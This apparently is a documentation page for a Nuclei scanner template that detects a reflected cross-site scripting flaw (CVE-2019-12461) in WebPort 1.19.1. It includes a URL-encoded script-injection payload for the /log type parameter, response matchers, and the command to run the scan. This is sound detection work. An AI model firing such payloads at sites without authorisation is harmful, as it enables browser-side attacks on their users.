WebPort 1.19.1 - Cross-Site Scripting
ID: CVE-2019-12461
Severity: medium
Author: pikpikcu
Tags: cve,cve2019,xss,webport
Description
Section titled “Description”Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
YAML Source
Section titled “YAML Source”id: CVE-2019-12461
info: name: WebPort 1.19.1 - Cross-Site Scripting author: pikpikcu severity: medium description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability. reference: - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS - https://webport.se/nedladdningar/ - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/ - https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png - https://nvd.nist.gov/vuln/detail/CVE-2019-12461 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-12461 cwe-id: CWE-79 epss-score: 0.0035 epss-percentile: 0.71796 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: webport product: web_port tags: cve,cve2019,xss,webport
http: - method: GET path: - '{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E'
matchers-condition: and matchers: - type: word part: body words: - '"</script><script>alert(document.domain);</script><script>'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a00473045022100c7081b37cf86334aa538937431efc76acf645f7ea65133cdcf94ba503936d1d7022028cec0f3157d1122578f509b71606c80c9463efe04ba5a78e1235d223d6a2ed6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-12461.yaml"